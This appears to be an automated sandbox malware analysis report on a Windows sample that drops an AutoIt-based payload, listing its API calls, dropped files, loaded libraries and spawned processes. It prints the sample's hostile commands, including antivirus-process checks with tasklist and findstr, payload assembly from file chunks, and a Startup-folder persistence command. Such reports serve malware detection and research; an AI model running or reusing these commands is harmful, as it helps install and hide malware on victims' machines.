Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\704579\u entropy: 7.99983843208Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh Dynamics\M entropy: 7.99983843208Jump to dropped file

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B4254: CreateFileW,DeviceIoControl,CloseHandle,11_2_002B4254
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002A8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_002A8F2E
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_002B5778
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00255778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00255778
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\TripsAstronomyJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\ParadeMorrisonJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\BibliographicHcJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0025B02011_2_0025B020
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002594E011_2_002594E0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00259C8011_2_00259C80
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002723F511_2_002723F5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002D840011_2_002D8400
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0028650211_2_00286502
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0028265E11_2_0028265E
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0025E6F011_2_0025E6F0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027282A11_2_0027282A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002889BF11_2_002889BF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002D0A3A11_2_002D0A3A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00286A7411_2_00286A74
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00260BE011_2_00260BE0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027CD5111_2_0027CD51
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002AEDB211_2_002AEDB2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B8E4411_2_002B8E44
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002D0EB711_2_002D0EB7
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00286FE611_2_00286FE6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002733B711_2_002733B7
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027F40911_2_0027F409
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0026D45D11_2_0026D45D
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0026F62811_2_0026F628
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0025166311_2_00251663
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0025F6A011_2_0025F6A0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002716B411_2_002716B4
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002778C311_2_002778C3
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027DBA511_2_0027DBA5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00271BA811_2_00271BA8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00289CE511_2_00289CE5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0026DD2811_2_0026DD28
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00271FC011_2_00271FC0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027BFD611_2_0027BFD6
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_001FB02017_2_001FB020
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_001F94E017_2_001F94E0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_001F9C8017_2_001F9C80
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_002123F517_2_002123F5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0027840017_2_00278400
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0022650217_2_00226502
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0022265E17_2_0022265E
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_001FE6F017_2_001FE6F0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0021282A17_2_0021282A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_002289BF17_2_002289BF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00270A3A17_2_00270A3A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00226A7417_2_00226A74
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00200BE017_2_00200BE0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0021CD5117_2_0021CD51
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0024EDB217_2_0024EDB2
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00258E4417_2_00258E44
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00270EB717_2_00270EB7
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00226FE617_2_00226FE6
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_002133B717_2_002133B7
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0021F40917_2_0021F409
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0020D45D17_2_0020D45D
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0020F62817_2_0020F628
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_001F166317_2_001F1663
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_002116B417_2_002116B4
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_001FF6A017_2_001FF6A0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_002178C317_2_002178C3
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0021DBA517_2_0021DBA5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00211BA817_2_00211BA8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00229CE517_2_00229CE5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0020DD2817_2_0020DD28
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00211FC017_2_00211FC0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0021BFD617_2_0021BFD6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: String function: 00261A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: String function: 00270D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: String function: 00278B30 appears 42 times
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: String function: 00218B30 appears 42 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: String function: 00210D17 appears 70 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: String function: 00201A36 appears 34 times
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs ldqj18tn.exe
Source: ldqj18tn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal84.rans.expl.evad.winEXE@28/26@2/0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BA6AD GetLastError,FormatMessageW,11_2_002BA6AD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002A8DE9 AdjustTokenPrivileges,CloseHandle,11_2_002A8DE9
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_002A9399
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00248DE9 AdjustTokenPrivileges,CloseHandle,17_2_00248DE9
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00249399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00249399
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_002B4148
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_002B443D
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh DynamicsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD1FB.tmpJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: ldqj18tn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\ldqj18tn.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ldqj18tn.exeReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ldqj18tn.exeFile read: C:\Users\user\Desktop\ldqj18tn.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\ldqj18tn.exe "C:\Users\user\Desktop\ldqj18tn.exe"
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif u
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"Jump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wsock32.dllJump to behavior
